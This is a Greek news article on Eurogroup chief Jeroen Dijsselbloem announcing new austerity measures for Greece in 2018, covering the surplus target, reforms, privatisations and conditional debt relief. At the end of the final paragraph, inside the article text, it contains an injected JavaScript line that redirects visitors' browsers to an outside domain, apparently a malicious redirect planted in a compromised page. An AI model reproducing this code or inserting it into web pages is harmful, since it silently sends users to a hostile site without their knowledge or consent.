«Ρουκέτα» Ντάισελμπλουμ: Νέα μέτρα λιτότητας το 2018 για την Ελλάδα

0
7

 

Η Ελλάδα και οι πολίτες της θα «ματώσουν» και το 2018, όπως αποκάλυψε ο επικεφαλής του Eurogroup, Γερούν Ντάισελμπλουμ.

Σε συνέντευξη που παραχώρησε από την Μάλτα, όπου βρίσκεται, ο Γερούν Ντάισελμπλουμ έβαλε ξεκάθαρα στο τραπέζι τα μέτρα του 2018, τα οποία εστιάζει σε μεταρρυθμίσεις και ιδιωτικοποιήσεις, ενώ προανήγγειλε πως, μείωση του πλεονάσματος κάτω από το 3,5% δεν προβλέπεται από το 2019, αλλά όταν θα το αποφασίσουν οι δανειστές.

«Μακροπρόθεσμα αυτό μπορεί να μειωθεί λίγο και αυτό πράγματι είναι μια ρεαλιστική προσέγγιση» είπε χαρακτηριστικά.

Αναφερόμενος στις συζητήσεις των θεσμών στην Αθήνα, είπε πως επικεντρώθηκαν στις μεταρρυθμίσεις στην αγορά εργασίας και στις ιδιωτικοποιήσεις.

«Αυτό που ακούω είναι ότι οι συνομιλίες ήταν πολύ εποικοδομητικές και έχει σημειωθεί μεγάλη πρόοδος» είπε ο επικεφαλής του Eurogroup.

Αναφερθείς στο χρέος, είπε πως το ζήτημα είχε ήδη τεθεί και συζητηθεί κατά τη διάρκεια του Eurogroup του Μαΐου, όπου συμφωνήθηκε να υπάρξουν βραχυπρόθεσμα μέτρα, προκειμένου να μειωθεί το βάρος του χρέους. «Στεκόμαστε στους Έλληνες και θα τους βοηθήσουμε να διαχειριστούν το χρέος» συμπλήρωσε, αλλά έθεσε ως προϋπόθεση η Ελλάδα να τηρήσει τους όρους του προγράμματος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here